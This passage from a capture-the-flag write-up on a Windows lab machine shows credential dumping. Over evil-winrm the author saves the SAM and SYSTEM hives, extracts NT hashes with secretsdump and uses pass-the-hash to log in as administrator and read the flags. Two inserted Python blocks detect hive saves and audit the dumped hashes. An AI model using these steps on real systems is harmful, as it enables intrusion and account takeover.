---- ------------- ------ ----
d----- 4/30/2025 8:51 PM temp
*Evil-WinRM* PS C:\Users\j.wilson> ls
Directorio: C:\Users\j.wilson
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/2/2024 6:37 PM 3D Objects
d-r--- 9/2/2024 6:37 PM Contacts
d-r--- 9/2/2024 7:14 PM Desktop
d-r--- 9/2/2024 7:12 PM Documents
d-r--- 9/2/2024 6:37 PM Downloads
d-r--- 9/2/2024 6:37 PM Favorites
d-r--- 9/2/2024 6:37 PM Links
d-r--- 9/2/2024 6:37 PM Music
d-r--- 9/2/2024 6:38 PM Pictures
d-r--- 9/2/2024 6:37 PM Saved Games
d-r--- 9/2/2024 6:38 PM Searches
d-r--- 9/2/2024 6:37 PM Videos
- cd .. (to change directory)
- mkdir C:\temp (create a folder named temp)
Now we obtain both files, which are:
- SAM (the database of password hashes)
- SYSTEM (the Windows system hive)
For that, we execute the commands you can see below:
- cd C:\temp (change directory to temp)
- reg save hklm\SAM C:\temp\sam.hive (save the SAM database to C:\temp so it can be copied to our attacker machine)
*Evil-WinRM* PS C:\Users\j.wilson> cd C:\temp
*Evil-WinRM* PS C:\temp> reg save hklm\SAM C:\temp\sam.hive
La operación se completó correctamente.
*Evil-WinRM* PS C:\temp> ls
Directorio: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/30/2025 8:54 PM 57344 sam.hive
Now we do the same with SYSTEM, as you can see below.
*Evil-WinRM* PS C:\temp> reg save hklm\SYSTEM C:\temp\system.hive
La operación se completó correctamente.
*Evil-WinRM* PS C:\temp> ls
Directorio: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/30/2025 8:54 PM 57344 sam.hive
-a---- 4/30/2025 8:56 PM 12001280 system.hive
Now that we have the SAM and SYSTEM hives, we download them to our machine with the evil-winrm commands:
- download sam.hive
- download system.hive
*Evil-WinRM* PS C:\temp> download sam.hive
Info: Downloading C:\temp\sam.hive to sam.hive
Info: Download successful!
*Evil-WinRM* PS C:\temp> download system.hive
Info: Downloading C:\temp\system.hive to system.hive
Info: Download successful!
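Seen from the blue team, the reg save of the SAM and SYSTEM hives above is a high-signal event: it is a legitimate administrative command, but one that regular users practically never run, and here it arrives through an interactive remote shell. The following Python is an added example, not part of this write-up: it triages constructed process-creation records (Sysmon Event ID 1 style field names) and rates a hive save whose parent is wsmprovhost.exe, the process that hosts WinRM sessions such as the evil-winrm one above, as high severity. The field names, the parent-process list and the sample events are assumptions for illustration.

```python
import re

# reg.exe save/export of a credential-bearing hive (SAM, SYSTEM or SECURITY).
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+(?:save|export)\s+"?'
    r'(?:hklm|hkey_local_machine)\\(?P<hive>sam|system|security)\b',
    re.IGNORECASE,
)
# Parents that mean the command came in over a remote shell; wsmprovhost.exe hosts WinRM sessions.
REMOTE_SHELL_PARENTS = {"wsmprovhost.exe"}


def hive_name(command_line):
    """Return 'SAM', 'SYSTEM' or 'SECURITY' if the command saves that hive, else None."""
    m = HIVE_SAVE.search(command_line)
    return m["hive"].upper() if m else None


def triage(events):
    """Flag process-creation events that dump a credential hive; WinRM-spawned ones rate high."""
    hits = []
    for ev in events:
        hive = hive_name(ev.get("CommandLine", ""))
        if hive is None:
            continue
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        hits.append({
            "severity": "high" if parent in REMOTE_SHELL_PARENTS else "medium",
            "hive": hive,
            "user": ev.get("User", "?"),
            "parent": parent,
            "command": ev["CommandLine"],
        })
    return hits


# Constructed sample events using Sysmon Event ID 1 field names; not real telemetry.
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\SAM C:\temp\sam.hive",
     "User": r"HOSTING\j.wilson",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'"C:\Windows\System32\reg.exe" save hklm\SYSTEM C:\temp\system.hive',
     "User": r"HOSTING\j.wilson",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",   # benign: a query, not a save
     "CommandLine": r"reg query hklm\SOFTWARE\Microsoft\Windows\CurrentVersion /v ProgramFilesDir",
     "User": r"HOSTING\f.miller",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",   # benign: not a credential hive
     "CommandLine": r"reg save hklm\SOFTWARE\Example C:\backup\example.hiv",
     "User": r"NT AUTHORITY\SYSTEM",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_PROCESS_EVENTS):
        print(f"[{hit['severity']}] {hit['user']} saved {hit['hive']} via {hit['parent']}: {hit['command']}")
```

The parent-process check is what separates a scheduled backup job from an operator typing into a remote shell; pairing this with the 4672 "special privileges assigned" event for SeBackupPrivilege on the same logon session gives the full chain shown in the write-up.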
Finally, we can see both files on the Kali machine, as you can see below:
┌──(kali㉿kali)-[~]
└─$ ls
1.c Desktop friendly2.txt id.txt Oralyzer reports sqlmap.txt usuarios_encontrados
alectodb-passwords.txt diccionario GOD-KILLER kenobi.txt ParamSpider reverse.zip.2 ssh usuarios_nuevos
alectodb-usernames.txt Docker headers kerbrute password.txt routersploit Suggester usuarios.txt
beef Documents herramientas log.txt Pictures rtl8188eu system.hive Videos
bypassamsi Downloads hosting.txt MKBRUTUS plugins.txt sam.hive Templates volatility3
capturas Empire hydra.restore morata.txt plugin.zip scripts thc-hydra WinboxExploit
cmdasp.aspx exploits ibombshell Music prueba.txt script.sh TheFatRat Windows-Exploit
contras
- sam.hive
- system.hive
To sum up, we extract the hashes with secretsdump in order to do pass-the-hash, with the command you can see below:
┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x827cc782adafc2fd1b7b7a48da1e20ba
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8afe1e889d0977f8571b3dc0524648aa:::
administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
p.smith:1003:aad3b435b51404eeaad3b435b51404ee:2cf4020e126a3314482e5e87a3f39508:::
f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
j.wilson:1006:aad3b435b51404eeaad3b435b51404ee:a6cf5ad66b08624854e80a8786ad6bac:::
[*] Cleaning up...
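The secretsdump output above tells a defender more than which hash to reuse: the same NT hash appears under f.miller and m.davis (two accounts sharing one password), several accounts carry the NT hash of the empty password, and every LM field is the empty-LM value, meaning LM storage is off. The following Python is an added example, not part of the original write-up or of Impacket: it parses a constructed dump in the same format and reports those password-hygiene findings without cracking anything. The sample dump, including the placeholder boot key and the extra legacy.svc account with a non-empty LM field, is constructed for illustration.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" : LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of "" : account has an empty password

# One account line of secretsdump's SAM section: user:rid:lmhash:nthash:::
SAM_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_sam_dump(text):
    """Return [(user, rid, lm, nt)] for every account line; status lines ([*] ...) are skipped."""
    entries = []
    for line in text.splitlines():
        m = SAM_LINE.match(line.strip())
        if m:
            entries.append((m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return entries


def audit(entries):
    """Findings visible from the hashes alone: empty passwords, LM hashes kept, shared passwords."""
    blank = [u for u, _, _, nt in entries if nt == EMPTY_NT]
    lm_stored = [u for u, _, lm, _ in entries if lm != EMPTY_LM]
    by_nt = defaultdict(list)
    for u, _, _, nt in entries:
        if nt != EMPTY_NT:
            by_nt[nt].append(u)
    # Identical NT hashes mean identical passwords (NT is unsalted), so reuse shows without cracking.
    shared = sorted(sorted(users) for users in by_nt.values() if len(users) > 1)
    return {"blank_password": blank, "lm_hash_stored": lm_stored, "shared_password": shared}


# Constructed sample modelled on the dump above; boot key and legacy.svc hashes are placeholders.
SAMPLE_DUMP = """\
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x00000000000000000000000000000000
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
legacy.svc:1010:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
[*] Cleaning up...
"""

if __name__ == "__main__":
    report = audit(parse_sam_dump(SAMPLE_DUMP))
    for finding, accounts in report.items():
        print(f"{finding}: {accounts}")
```

An empty NT hash on the built-in RID 500 and 501 accounts usually means they are disabled rather than passwordless, so the blank_password list is a prompt to check account status, not a finding on its own; the shared_password groups, on the other hand, are actionable immediately, because whichever of the two passwords is guessed (or reused from another system) opens both accounts.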
Now we open a shell to obtain the user flag and the root flag, but first we enter as administrator with the NT hash, as you can see below.
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 192.168.88.8 -u administrator -H 41186fb28e283ff758bb3dbeb6fb4a5c
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\administrator\Documents> whoami
hosting\administrator
*Evil-WinRM* PS C:\Users\administrator\Documents> ls
*Evil-WinRM* PS C:\Users\administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\administrator> ls
Directorio: C:\Users\administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/3/2024 9:15 PM 3D Objects
d-r--- 7/3/2024 9:15 PM Contacts
d-r--- 7/3/2024 9:49 PM Desktop
d-r--- 7/3/2024 9:15 PM Documents
d-r--- 7/3/2024 9:15 PM Downloads
d-r--- 7/3/2024 9:15 PM Favorites
d-r--- 7/3/2024 9:15 PM Links
d-r--- 7/3/2024 9:15 PM Music
d-r--- 7/3/2024 9:17 PM Pictures
d-r--- 7/3/2024 9:15 PM Saved Games
d-r--- 7/3/2024 9:17 PM Searches
d-r--- 9/2/2024 7:05 PM Videos
*Evil-WinRM* PS C:\Users\administrator> cd Desktop
*Evil-WinRM* PS C:\Users\administrator\Desktop> ls
Gotcha! I have discovered the root flag, which you can see below, in this path:
- C:\Users\administrator\Desktop\root.txt
Directorio: C:\Users\administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/2/2024 7:15 PM 70 root.txt
*Evil-WinRM* PS C:\Users\administrator\Desktop> type root.txt
9924b42399b3e0704068a3012871dc98
*Evil-WinRM* PS C:\Users\administrator> cd ..
*Evil-WinRM* PS C:\Users> ls
Directorio: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/2/2024 6:16 PM administrator
d----- 9/2/2024 6:13 PM DefaultAppPool
d----- 9/2/2024 6:40 PM f.miller
d----- 9/2/2024 6:37 PM j.wilson
d----- 9/2/2024 6:35 PM m.davis
d----- 9/2/2024 6:22 PM p.smith
d-r--- 7/3/2024 8:04 PM Public
*Evil-WinRM* PS C:\Users> cd j.wilson
*Evil-WinRM* PS C:\Users\j.wilson> ls
Directorio: C:\Users\j.wilson
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/2/2024 6:37 PM 3D Objects
d-r--- 9/2/2024 6:37 PM Contacts
d-r--- 9/2/2024 7:14 PM Desktop
d-r--- 9/2/2024 7:12 PM Documents
d-r--- 9/2/2024 6:37 PM Downloads
d-r--- 9/2/2024 6:37 PM Favorites
d-r--- 9/2/2024 6:37 PM Links
d-r--- 9/2/2024 6:37 PM Music
d-r--- 9/2/2024 6:38 PM Pictures
d-r--- 9/2/2024 6:37 PM Saved Games
d-r--- 9/2/2024 6:38 PM Searches
d-r--- 9/2/2024 6:37 PM Videos
Gotcha! I have discovered the user flag, which you can see below, in this path:
- C:\Users\j.wilson\Desktop\user.txt
*Evil-WinRM* PS C:\Users\j.wilson> cd Desktop
*Evil-WinRM* PS C:\Users\j.wilson\Desktop> ls
Directorio: C:\Users\j.wilson\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/2/2024 7:14 PM 70 user.txt
*Evil-WinRM* PS C:\Users\j.wilson\Desktop> type user.txt
50e5add3f5cb0642fefc5e907086b313
Thank you very much for reading this article.
I hope you liked it and learned something new.
This article has been written for ethical purposes.
Good Hack